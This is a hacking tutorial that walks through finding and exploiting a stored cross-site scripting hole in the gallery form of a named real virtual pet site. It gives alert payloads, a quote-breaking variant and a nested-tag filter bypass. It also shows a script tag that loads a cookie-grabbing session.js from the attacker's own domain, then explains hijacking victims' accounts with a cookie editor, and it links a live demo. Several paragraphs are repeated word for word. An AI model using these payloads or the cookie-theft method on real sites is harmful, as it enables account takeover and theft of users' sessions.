Hacking Websites
Information
XSS stands for Cross Site Scripting. These exploits are usually used in conjunction with a cookie grabber, and a cookie editor addon (such as Add n Edit Cookies for Mozilla Firefox) to steal accounts from various websites. This is a very easy way to steal users passwords right from the site.
XSS stands for Cross Site Scripting. These exploits are usually used in conjunction with a cookie grabber, and a cookie editor addon (such as Add n Edit Cookies for Mozilla Firefox) to steal accounts from various websites. This is a very easy way to steal users passwords right from the site.
In this tutorial, you will learn to do some basic XSS auditing, and learn to exploit those holes to gain access.
Chapter 1 – Finding a Site
Good sites to practice on are sites that have a lot of user input. Profile sites (Myspace-Clones, Virtual Pet Sites, etc.) are great.
For this tutorial, lets use the online virtual pet site Rescreatu.
Good sites to practice on are sites that have a lot of user input. Profile sites (Myspace-Clones, Virtual Pet Sites, etc.) are great.
For this tutorial, lets use the online virtual pet site Rescreatu.
Lets start hacking
Part B – Finding the Vuln ( Security Hole )
XSS Vulnerabilities are created when the programmers don’t validate the data a user inputs. On this particular site, I know of one exploit I just found. There are probably more, but lets just use the one I found so far.
XSS Vulnerabilities are created when the programmers don’t validate the data a user inputs. On this particular site, I know of one exploit I just found. There are probably more, but lets just use the one I found so far.
The exploit is found in the Gallery area of the site. A Gallery is where you apparently put ‘rare’ items in the game to be shown off to people.
The idiots don’t validate the input for the shop name and description. You don’t even need to obfuscate the attack vector.
Navigate to: http://www.rescreatu.com/gallery/manage.php
Create the gallery if you must.
Now, in the shop name, type:
Now, in the shop name, type:
Code:
<script>alert('xss 1')</script>
And in the shop description put:
Code:
<script>alert('xss 2')</script>
And hit create. Now, click on View Gallery and lets see if it worked.
We get xss 2, but not xss 1. At least we have one hole. (Note that XSS 1 can work, if you obfuscate it a little bit. All you need to do is type ‘><script>alert(‘xss 1′)</script> and it works.)
Now that we have an XSS vector… Let’s have some fun and steal some accounts.
Exploiting the hole.
Now, you may be wondering how to take advantage of the ability to use javascript. Seems stupid, right? Wrong.
Exploiting the hole.
Now, you may be wondering how to take advantage of the ability to use javascript. Seems stupid, right? Wrong.
Here’s a hint on what you can do. Try changing “alert(‘xss‘)” to “alert(document.cookie)” and see what happens.
Yep, it pops an alert box with your cookies.
Start by putting those files on your webserver, as I said. In ‘session.js’, change the domain name to the place you are hosting the script from, and change SITEPREFIX to Rescreatu, so you know what site the cookies are from.
After uploading all the cookie grabbing scripts, let’s try it out.
Go to edit your gallery details, and change the description to this:
Code:
<script src="http://domain.com/session.js">
Where domain.com is your domain with the cookie grabbing script.
Now lets navigate to our sessions.txt.
It works! It grabs the cookies. Now just use the firefox addon “add n edit cookies”, filter it to only show cookies from Rescreatu Pets, and change your cookies to match the ones on the log.
I don’t know if this works for stealing accounts on Rescreatu, since it only grabs the PHPSESSID cookie. But on 90% of sites with XSS holes, this works.
Enjoy.. any questions, ask me.
For a live demo, check out http://www.rescreatu.com/game.php?a…allery&id=47729
And then view your sessions.txt file.
For other sites that try to block XSS… there are ways around it.
For instance, lets say you type in “<script>alert(‘xss‘)</script>” and when you save, it changes it to alert(‘xss‘) and totally removes the <script> and </script>.
Then let’s try this:
<sc<script>ript>alert(‘xss‘)</scr</script>ipt>
<sc<script>ript>alert(‘xss‘)</scr</script>ipt>
And hit save. Voila! This usually works, since it replaces the <script> and </script> with nothing , thus closing the tags you broke up around it.
Try obfuscation tricks like this to get around it